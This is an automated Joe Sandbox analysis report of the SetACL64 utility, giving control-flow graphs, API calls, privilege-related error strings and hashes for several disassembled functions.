                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2831 7ff686843d1b-7ff686843d4b AdjustTokenPrivileges 2832 7ff686843d66-7ff686843d79 GetLastError CloseHandle 2831->2832 2833 7ff686843d4d-7ff686843d55 GetLastError 2831->2833 2835 7ff686843d7a-7ff686843d83 2832->2835 2833->2832 2834 7ff686843d57-7ff686843d64 CloseHandle 2833->2834 2834->2835 2836 7ff686843dbc-7ff686843dd8 2835->2836 2837 7ff686843d85-7ff686843d9c 2835->2837 2840 7ff686843dda-7ff686843df1 2836->2840 2841 7ff686843e11-7ff686843e13 2836->2841 2838 7ff686843db7 call 7ff6868621a0 2837->2838 2839 7ff686843d9e-7ff686843db1 2837->2839 2838->2836 2839->2838 2844 7ff68684440d-7ff686844412 call 7ff6868688fc 2839->2844 2846 7ff686843e0c call 7ff6868621a0 2840->2846 2847 7ff686843df3-7ff686843e06 2840->2847 2842 7ff686843e19-7ff686843e9f call 7ff686833f80 * 2 call 7ff68683d260 2841->2842 2843 7ff686843f1b-7ff686844040 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 2841->2843 2871 7ff686843ed9-7ff686843ee2 2842->2871 2872 7ff686843ea1-7ff686843eb8 2842->2872 2869 7ff686844079-7ff686844095 2843->2869 2870 7ff686844042-7ff686844059 2843->2870 2852 7ff686844413-7ff686844418 call 7ff6868688fc 2844->2852 2846->2841 2847->2846 2847->2852 2862 7ff686844419-7ff68684441e call 7ff6868688fc 2852->2862 2873 7ff68684441f-7ff686844424 call 7ff6868688fc 2862->2873 2876 7ff686844097-7ff6868440ae 2869->2876 2877 7ff6868440ce-7ff6868440d0 2869->2877 2874 7ff68684405b-7ff68684406e 2870->2874 2875 7ff686844074 call 7ff6868621a0 2870->2875 2871->2843 2881 7ff686843ee4-7ff686843efb 2871->2881 2878 7ff686843eba-7ff686843ecd 2872->2878 2879 7ff686843ed3-7ff686843ed8 call 7ff6868621a0 2872->2879 2892 7ff686844425-7ff68684442a call 7ff6868688fc 2873->2892 2874->2873 2874->2875 2875->2869 2885 7ff6868440c9 call 7ff6868621a0 2876->2885 2886 7ff6868440b0-7ff6868440c3 2876->2886 2888 7ff6868441d8-7ff686844209 2877->2888 2889 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 2877->2889 2878->2862 2878->2879 2879->2871 2882 7ff686843f16 call 7ff6868621a0 2881->2882 2883 7ff686843efd-7ff686843f10 2881->2883 2882->2843 2883->2882 2893 7ff6868443dd-7ff68684440c call 7ff6868688fc * 8 2883->2893 2885->2877 2886->2885 2886->2892 2894 7ff686844268-7ff686844294 2888->2894 2895 7ff68684420b-7ff68684420e 2888->2895 2942 7ff686844196-7ff68684419f 2889->2942 2943 7ff68684415e-7ff686844175 2889->2943 2914 7ff68684442b-7ff686844430 call 7ff6868688fc 2892->2914 2893->2844 2902 7ff686844296-7ff686844299 2894->2902 2903 7ff686844314-7ff686844320 2894->2903 2901 7ff686844210-7ff686844220 2895->2901 2907 7ff686844239-7ff686844266 2901->2907 2908 7ff686844222-7ff686844233 call 7ff68685e4b0 2901->2908 2911 7ff6868442a0-7ff6868442b4 2902->2911 2909 7ff686844335-7ff686844341 2903->2909 2910 7ff686844322-7ff68684432c call 7ff68685e4b0 2903->2910 2907->2894 2907->2901 2908->2907 2935 7ff686844356-7ff68684435b 2908->2935 2917 7ff68684435d-7ff686844367 call 7ff686844810 2909->2917 2918 7ff686844343-7ff686844354 call 7ff68685e4b0 2909->2918 2926 7ff686844331-7ff686844333 2910->2926 2919 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 2911->2919 2920 7ff6868442cd-7ff6868442d2 2911->2920 2944 7ff686844369-7ff686844372 2917->2944 2945 7ff6868443b1-7ff6868443dc call 7ff686862180 2917->2945 2918->2917 2918->2935 2919->2920 2919->2935 2930 7ff6868442ea-7ff686844312 2920->2930 2931 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 2920->2931 2926->2909 2926->2935 2930->2903 2930->2911 2931->2930 2931->2935 2935->2945 2942->2888 2952 7ff6868441a1-7ff6868441b8 2942->2952 2947 7ff686844177-7ff68684418a 2943->2947 2948 7ff686844190-7ff686844195 call 7ff6868621a0 2943->2948 2949 7ff68684439e-7ff6868443a1 2944->2949 2950 7ff686844374-7ff686844396 call 7ff68684a350 2944->2950 2947->2914 2947->2948 2948->2942 2959 7ff6868443af 2949->2959 2960 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 2949->2960 2950->2945 2967 7ff686844398 2950->2967 2957 7ff6868441ba-7ff6868441cd 2952->2957 2958 7ff6868441d3 call 7ff6868621a0 2952->2958 2957->2893 2957->2958 2958->2888 2959->2945 2960->2959 2967->2949
                                        APIs
                                        Strings
                                        • Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right, xrefs: 00007FF686843E37
                                        • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
                                        • Prepare, xrefs: 00007FF686843E67, 00007FF686844124
                                        • SeTakeOwnershipPrivilege, xrefs: 00007FF686843F39
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                        • String ID: Prepare$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeTakeOwnershipPrivilege
                                        • API String ID: 637398405-1701055250
                                        • Opcode ID: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                        • Instruction ID: d6ebd7ad4d04b0742e7c3d1876236b290937e98c7a16907e16e8ffb0d61cd811
                                        • Opcode Fuzzy Hash: 37c1be51e2417e488a72d3dcc0cf2b981f55e4b54b9d20b9a241d83790859c59
                                        • Instruction Fuzzy Hash: ACE1A2B2B18786C2EE10CB55E4483696365FF847E4F505139EA5D87AE8DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3213 7ff686843fd8-7ff686844008 AdjustTokenPrivileges 3214 7ff68684400a-7ff686844012 GetLastError 3213->3214 3215 7ff686844023-7ff686844036 GetLastError CloseHandle 3213->3215 3214->3215 3216 7ff686844014-7ff686844021 CloseHandle 3214->3216 3217 7ff686844037-7ff686844040 3215->3217 3216->3217 3218 7ff686844079-7ff686844095 3217->3218 3219 7ff686844042-7ff686844059 3217->3219 3222 7ff686844097-7ff6868440ae 3218->3222 3223 7ff6868440ce-7ff6868440d0 3218->3223 3220 7ff68684405b-7ff68684406e 3219->3220 3221 7ff686844074 call 7ff6868621a0 3219->3221 3220->3221 3224 7ff68684441f-7ff686844424 call 7ff6868688fc 3220->3224 3221->3218 3226 7ff6868440c9 call 7ff6868621a0 3222->3226 3227 7ff6868440b0-7ff6868440c3 3222->3227 3228 7ff6868441d8-7ff686844209 3223->3228 3229 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 3223->3229 3233 7ff686844425-7ff68684442a call 7ff6868688fc 3224->3233 3226->3223 3227->3226 3227->3233 3231 7ff686844268-7ff686844294 3228->3231 3232 7ff68684420b-7ff68684420e 3228->3232 3274 7ff686844196-7ff68684419f 3229->3274 3275 7ff68684415e-7ff686844175 3229->3275 3239 7ff686844296-7ff686844299 3231->3239 3240 7ff686844314-7ff686844320 3231->3240 3238 7ff686844210-7ff686844220 3232->3238 3250 7ff68684442b-7ff686844430 call 7ff6868688fc 3233->3250 3244 7ff686844239-7ff686844266 3238->3244 3245 7ff686844222-7ff686844233 call 7ff68685e4b0 3238->3245 3248 7ff6868442a0-7ff6868442b4 3239->3248 3246 7ff686844335-7ff686844341 3240->3246 3247 7ff686844322-7ff68684432c call 7ff68685e4b0 3240->3247 3244->3231 3244->3238 3245->3244 3268 7ff686844356-7ff68684435b 3245->3268 3253 7ff68684435d-7ff686844367 call 7ff686844810 3246->3253 3254 7ff686844343-7ff686844354 call 7ff68685e4b0 3246->3254 3260 7ff686844331-7ff686844333 3247->3260 3255 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 3248->3255 3256 7ff6868442cd-7ff6868442d2 3248->3256 3276 7ff686844369-7ff686844372 3253->3276 3277 7ff6868443b1-7ff6868443dc call 7ff686862180 3253->3277 3254->3253 3254->3268 3255->3256 3255->3268 3264 7ff6868442ea-7ff686844312 3256->3264 3265 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 3256->3265 3260->3246 3260->3268 3264->3240 3264->3248 3265->3264 3265->3268 3268->3277 3274->3228 3283 7ff6868441a1-7ff6868441b8 3274->3283 3278 7ff686844177-7ff68684418a 3275->3278 3279 7ff686844190-7ff686844195 call 7ff6868621a0 3275->3279 3280 7ff68684439e-7ff6868443a1 3276->3280 3281 7ff686844374-7ff686844396 call 7ff68684a350 3276->3281 3278->3250 3278->3279 3279->3274 3289 7ff6868443af 3280->3289 3290 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 3280->3290 3281->3277 3296 7ff686844398 3281->3296 3287 7ff6868441ba-7ff6868441cd 3283->3287 3288 7ff6868441d3 call 7ff6868621a0 3283->3288 3287->3288 3294 7ff6868443dd-7ff68684441e call 7ff6868688fc * 11 3287->3294 3288->3228 3289->3277 3290->3289 3294->3224 3296->3280
                                        APIs
                                        Strings
                                        • Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with , xrefs: 00007FF6868440F4
                                        • Prepare, xrefs: 00007FF686844124
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CloseErrorHandleLast$AdjustPrivilegesToken
                                        • String ID: Prepare$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with
                                        • API String ID: 1992325626-2245062721
                                        • Opcode ID: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                        • Instruction ID: 17c5320fa135c33c8e6c1b2a4bae653178f06b8b82d40f068ecf13cb63e997f2
                                        • Opcode Fuzzy Hash: 711c004ea780279e093e6d90f040bc076e91dc0aa13779505b0cf60af36ac5f3
                                        • Instruction Fuzzy Hash: 8DA19FB2B18786C2EA24CB55E0483A96365FF84BE4F405139DA5D876E4DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3407 7ff686876c40-7ff686876c9c call 7ff686873e64 3410 7ff686876cb5-7ff686876cbc 3407->3410 3411 7ff686876c9e-7ff686876cb2 call 7ff686876ba4 3407->3411 3413 7ff686876d0b call 7ff68687648c 3410->3413 3414 7ff686876cbe-7ff686876cc5 3410->3414 3411->3410 3421 7ff686876d10-7ff686876d14 3413->3421 3416 7ff686876cc7-7ff686876ccc call 7ff686876534 3414->3416 3417 7ff686876cce call 7ff686876604 3414->3417 3422 7ff686876cd3-7ff686876cd7 3416->3422 3417->3422 3424 7ff686876e6d 3421->3424 3425 7ff686876d1a-7ff686876d25 3421->3425 3422->3425 3428 7ff686876cd9-7ff686876cef call 7ff686876ba4 3422->3428 3429 7ff686876e6f-7ff686876e8d 3424->3429 3426 7ff686876d27-7ff686876d2b 3425->3426 3427 7ff686876d35-7ff686876d38 call 7ff686876a74 3425->3427 3426->3427 3430 7ff686876d2d-7ff686876d33 GetACP 3426->3430 3433 7ff686876d3d-7ff686876d41 3427->3433 3428->3421 3436 7ff686876cf1-7ff686876cfb 3428->3436 3430->3433 3433->3424 3435 7ff686876d47-7ff686876d4c 3433->3435 3435->3424 3437 7ff686876d52-7ff686876d5d IsValidCodePage 3435->3437 3438 7ff686876cfd-7ff686876d02 call 7ff686876534 3436->3438 3439 7ff686876d04-7ff686876d09 call 7ff686876604 3436->3439 3437->3424 3440 7ff686876d63-7ff686876d66 3437->3440 3438->3421 3439->3421 3443 7ff686876d6b-7ff686876d6e 3440->3443 3444 7ff686876d68 3440->3444 3447 7ff686876e66-7ff686876e6b 3443->3447 3448 7ff686876d74-7ff686876d7f 3443->3448 3444->3443 3447->3429 3449 7ff686876d83-7ff686876d8b 3448->3449 3449->3449 3450 7ff686876d8d-7ff686876da2 call 7ff6868752dc 3449->3450 3453 7ff686876da8-7ff686876dbe call 7ff686877eb0 3450->3453 3454 7ff686876e8e-7ff686876f1b call 7ff68686892c call 7ff686873e64 * 2 call 7ff686877448 GetLocaleInfoW 3450->3454 3453->3424 3459 7ff686876dc4-7ff686876de3 call 7ff686877eb0 3453->3459 3471 7ff686876f1d-7ff686876f22 3454->3471 3472 7ff686876f24-7ff686876f37 call 7ff68687c558 3454->3472 3459->3424 3465 7ff686876de9-7ff686876df9 call 7ff6868831a0 3459->3465 3473 7ff686876e0b-7ff686876e22 call 7ff686877eb0 3465->3473 3474 7ff686876dfb-7ff686876e09 call 7ff6868831a0 3465->3474 3475 7ff686876f63-7ff686876f8b call 7ff686862180 3471->3475 3483 7ff686876f59-7ff686876f60 3472->3483 3484 7ff686876f39 3472->3484 3473->3424 3485 7ff686876e24-7ff686876e31 3473->3485 3474->3473 3474->3485 3483->3475 3487 7ff686876f40-7ff686876f43 3484->3487 3488 7ff686876e52-7ff686876e61 call 7ff68687da08 3485->3488 3489 7ff686876e33-7ff686876e4e call 7ff6868752dc 3485->3489 3487->3483 3492 7ff686876f45-7ff686876f4e 3487->3492 3488->3447 3489->3454 3495 7ff686876e50 3489->3495 3492->3487 3494 7ff686876f50-7ff686876f56 3492->3494 3494->3483 3495->3447
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLastNameTranslate$CodePageValid
                                        • String ID: utf8
                                        • API String ID: 2136749100-905460609
                                        • Opcode ID: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                        • Instruction ID: 9c102d64d270edf609c833b25d11542124b4314424bb4e8ea6a0ac4bf71eceeb
                                        • Opcode Fuzzy Hash: 06256d3170ea4477562b1b0a5136ccd5b8742c98d410ffa777cce2510612fae9
                                        • Instruction Fuzzy Hash: C9919AB2B08746C6EB209F21D840AA927B4FF85B84F544039DA4D87796DF7EED91C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Create$Event$Mutex
                                        • String ID:
                                        • API String ID: 646228171-0
                                        • Opcode ID: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                        • Instruction ID: 483f1282f2341bf1f79c2d7af73d9d32fde9014bd7fad07d434caa21cf24570a
                                        • Opcode Fuzzy Hash: 6379593e08b2bd55a17043a86bbd2af44a1a5acfd305ab3cea2657f90ecb20a5
                                        • Instruction Fuzzy Hash: 9A015EB1D28A52C2F314CB28BC5A7293691BF98311F505A3DD94DA59E0DF7F2440D721
                                        APIs
                                        • GetLastError.KERNEL32 ref: 00007FF68687B7F1
                                          • Part of subcall function 00007FF686874FDC: HeapAlloc.KERNEL32(?,?,00000000,00007FF68687403D,?,?,00005D604750197C,00007FF68686E201,?,?,?,?,00007FF68687BCFA,?,?,00000000), ref: 00007FF686875031
                                          • Part of subcall function 00007FF686875054: HeapFree.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,00005D604750197C,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687506A
                                          • Part of subcall function 00007FF686875054: GetLastError.KERNEL32(?,?,00007FF6868734C7,00007FF686874ADC,?,?,?,00007FF686874E5F,?,?,00005D604750197C,00007FF686875874,?,?,?,00007FF6868757A7), ref: 00007FF68687507C
                                          • Part of subcall function 00007FF686880AE0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686880B0E
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 916656526-0
                                        • Opcode ID: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
                                        • Instruction ID: 81d752a16e4d376267d6bd1060c03394d73072050616f1b6b0d350226d8d51de
                                        • Opcode Fuzzy Hash: 9a6b151fff7fe705bade6372d1f70266f2a0bdc1aa92e79f8fe535abbd962b58
                                        • Instruction Fuzzy Hash: 7E4196A1B0D28785E6609E566461BBA66A3BF857C4F14413DEF4D8BB81DE3EEC01C720

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1530 7ff686843a20-7ff686843ac6 GetLastError 1532 7ff686843ac8-7ff686843adf 1530->1532 1533 7ff686843aff-7ff686843b1b 1530->1533 1536 7ff686843afa call 7ff6868621a0 1532->1536 1537 7ff686843ae1-7ff686843af4 1532->1537 1534 7ff686843b1d-7ff686843b34 1533->1534 1535 7ff686843b54-7ff686843b56 1533->1535 1538 7ff686843b36-7ff686843b49 1534->1538 1539 7ff686843b4f call 7ff6868621a0 1534->1539 1540 7ff686843b5c-7ff686843be2 call 7ff686833f80 * 2 call 7ff68683d260 1535->1540 1541 7ff686843c5e-7ff686843d83 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1535->1541 1536->1533 1537->1536 1542 7ff6868443fb-7ff686844400 call 7ff6868688fc 1537->1542 1538->1539 1544 7ff686844401-7ff686844406 call 7ff6868688fc 1538->1544 1539->1535 1568 7ff686843c1c-7ff686843c25 1540->1568 1569 7ff686843be4-7ff686843bfb 1540->1569 1566 7ff686843dbc-7ff686843dd8 1541->1566 1567 7ff686843d85-7ff686843d9c 1541->1567 1542->1544 1556 7ff686844407-7ff68684440c call 7ff6868688fc 1544->1556 1565 7ff68684440d-7ff686844412 call 7ff6868688fc 1556->1565 1593 7ff686844413-7ff686844418 call 7ff6868688fc 1565->1593 1574 7ff686843dda-7ff686843df1 1566->1574 1575 7ff686843e11-7ff686843e13 1566->1575 1572 7ff686843db7 call 7ff6868621a0 1567->1572 1573 7ff686843d9e-7ff686843db1 1567->1573 1568->1541 1570 7ff686843c27-7ff686843c3e 1568->1570 1576 7ff686843c16-7ff686843c1b call 7ff6868621a0 1569->1576 1577 7ff686843bfd-7ff686843c10 1569->1577 1581 7ff686843c59 call 7ff6868621a0 1570->1581 1582 7ff686843c40-7ff686843c53 1570->1582 1572->1566 1573->1565 1573->1572 1585 7ff686843e0c call 7ff6868621a0 1574->1585 1586 7ff686843df3-7ff686843e06 1574->1586 1579 7ff686843e19-7ff686843e9f call 7ff686833f80 * 2 call 7ff68683d260 1575->1579 1580 7ff686843f1b-7ff686844040 call 7ff686833f80 * 2 GetCurrentProcess OpenProcessToken GetLastError 1575->1580 1576->1568 1577->1556 1577->1576 1617 7ff686843ed9-7ff686843ee2 1579->1617 1618 7ff686843ea1-7ff686843eb8 1579->1618 1615 7ff686844079-7ff686844095 1580->1615 1616 7ff686844042-7ff686844059 1580->1616 1581->1541 1582->1581 1591 7ff6868443dd-7ff6868443fa call 7ff6868688fc * 5 1582->1591 1585->1575 1586->1585 1586->1593 1591->1542 1604 7ff686844419-7ff68684441e call 7ff6868688fc 1593->1604 1619 7ff68684441f-7ff686844424 call 7ff6868688fc 1604->1619 1623 7ff686844097-7ff6868440ae 1615->1623 1624 7ff6868440ce-7ff6868440d0 1615->1624 1621 7ff68684405b-7ff68684406e 1616->1621 1622 7ff686844074 call 7ff6868621a0 1616->1622 1617->1580 1628 7ff686843ee4-7ff686843efb 1617->1628 1625 7ff686843eba-7ff686843ecd 1618->1625 1626 7ff686843ed3-7ff686843ed8 call 7ff6868621a0 1618->1626 1640 7ff686844425-7ff68684442a call 7ff6868688fc 1619->1640 1621->1619 1621->1622 1622->1615 1633 7ff6868440c9 call 7ff6868621a0 1623->1633 1634 7ff6868440b0-7ff6868440c3 1623->1634 1636 7ff6868441d8-7ff686844209 1624->1636 1637 7ff6868440d6-7ff68684415c call 7ff686833f80 * 2 call 7ff68683d260 1624->1637 1625->1604 1625->1626 1626->1617 1629 7ff686843f16 call 7ff6868621a0 1628->1629 1630 7ff686843efd-7ff686843f10 1628->1630 1629->1580 1630->1591 1630->1629 1633->1624 1634->1633 1634->1640 1641 7ff686844268-7ff686844294 1636->1641 1642 7ff68684420b-7ff68684420e 1636->1642 1689 7ff686844196-7ff68684419f 1637->1689 1690 7ff68684415e-7ff686844175 1637->1690 1662 7ff68684442b-7ff686844430 call 7ff6868688fc 1640->1662 1651 7ff686844296-7ff686844299 1641->1651 1652 7ff686844314-7ff686844320 1641->1652 1649 7ff686844210-7ff686844220 1642->1649 1655 7ff686844239-7ff686844266 1649->1655 1656 7ff686844222-7ff686844233 call 7ff68685e4b0 1649->1656 1660 7ff6868442a0-7ff6868442b4 1651->1660 1657 7ff686844335-7ff686844341 1652->1657 1658 7ff686844322-7ff68684432c call 7ff68685e4b0 1652->1658 1655->1641 1655->1649 1656->1655 1682 7ff686844356-7ff68684435b 1656->1682 1665 7ff68684435d-7ff686844367 call 7ff686844810 1657->1665 1666 7ff686844343-7ff686844354 call 7ff68685e4b0 1657->1666 1673 7ff686844331-7ff686844333 1658->1673 1668 7ff6868442b6-7ff6868442c7 call 7ff68685e4b0 1660->1668 1669 7ff6868442cd-7ff6868442d2 1660->1669 1691 7ff686844369-7ff686844372 1665->1691 1692 7ff6868443b1-7ff6868443dc call 7ff686862180 1665->1692 1666->1665 1666->1682 1668->1669 1668->1682 1678 7ff6868442ea-7ff686844312 1669->1678 1679 7ff6868442d4-7ff6868442e8 call 7ff68685e4b0 1669->1679 1673->1657 1673->1682 1678->1652 1678->1660 1679->1678 1679->1682 1682->1692 1689->1636 1698 7ff6868441a1-7ff6868441b8 1689->1698 1693 7ff686844177-7ff68684418a 1690->1693 1694 7ff686844190-7ff686844195 call 7ff6868621a0 1690->1694 1695 7ff68684439e-7ff6868443a1 1691->1695 1696 7ff686844374-7ff686844396 call 7ff68684a350 1691->1696 1693->1662 1693->1694 1694->1689 1704 7ff6868443af 1695->1704 1705 7ff6868443a3-7ff6868443aa call 7ff68685b2b0 1695->1705 1696->1692 1710 7ff686844398 1696->1710 1702 7ff6868441ba-7ff6868441cd 1698->1702 1703 7ff6868441d3 call 7ff6868621a0 1698->1703 1702->1591 1702->1703 1703->1636 1704->1692 1705->1704 1710->1695
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1719904131.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 0000000B.00000002.1719886846.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719942349.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719964207.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 0000000B.00000002.1719980879.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastProcess$CurrentOpenToken
                                        • String ID: Prepare$Privilege 'Back up files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Restore files and directories' could not be enabled. SetACL's powers are restricted. Better run SetACL with admin right$Privilege 'Take ownership of files or other objects' could not be enabled. SetACL's powers are restricted. Better run SetACL with $SeRestorePrivilege$SeTakeOwnershipPrivilege
                                        • API String ID: 6815931-1541018277
                                        • Opcode ID: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                        • Instruction ID: d3aeac8cba9e603a5d0f1641d2f012f4b63d9029f6ca9353756cfe1e6f409ec1
                                        • Opcode Fuzzy Hash: e7fd04f08fec1a0ecb78bb51fd9c432250016c32d835b16c80ef034a2c114e38
                                        • Instruction Fuzzy Hash: 0122B5F2A19782C2EE108B59E04836D6365FF857E4F405139E65D87AE9DFBEE880C710

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1711 7ff686842dcb-7ff686842dd3 1712 7ff686842dd9-7ff686842de1 1711->1712 1713 7ff68684346c-7ff68684347c call 7ff686864c18 1711->1713 1714 7ff686842de7-7ff686842deb 1712->1714 1715 7ff686843481-7ff686843495 call 7ff686864c18 1712->1715 1713->1715 1717 7ff686842ded-7ff686842dfd call 7ff686847b10 1714->1717 1718 7ff686842e03-7ff686842e0e 1714->1718 1721 7ff68684349a-7ff6868434aa call 7ff686864c18 1715->1721 1717->1718 1717->1721 1722 7ff686842e1a-7ff686842e32 1718->1722 1723 7ff686842e10-7ff686842e14 1718->1723 1735 7ff6868434af-7ff6868434c4 call 7ff686864c18 1721->1735 1724 7ff686842e4f-7ff686842e52 1722->1724 1725 7ff686842e34-7ff686842e4d call 7ff686829520 call 7ff6868496d0 1722->1725 1728 7ff686842e16-7ff686842e18 1723->1728 1729 7ff686842e90-7ff686842e9d 1723->1729 1733 7ff686842e6f-7ff686842e82 call 7ff686829520 call 7ff68684bc40 1724->1733 1734 7ff686842e54-7ff686842e66 call 7ff686829520 call 7ff68684b710 1724->1734 1764 7ff686842e84-7ff686842e8a 1725->1764 1728->1722 1728->1729 1731 7ff6868431e4 1729->1731 1732 7ff686842ea3-7ff686842ea5 1729->1732 1741 7ff6868431ea-7ff6868431ec 1731->1741 1732->1731 1737 7ff686842eab-7ff686842ef7 1732->1737 1733->1764 1767 7ff686842e6b-7ff686842e6d 1734->1767 1750 7ff6868434c5-7ff6868434da call 7ff686864c18 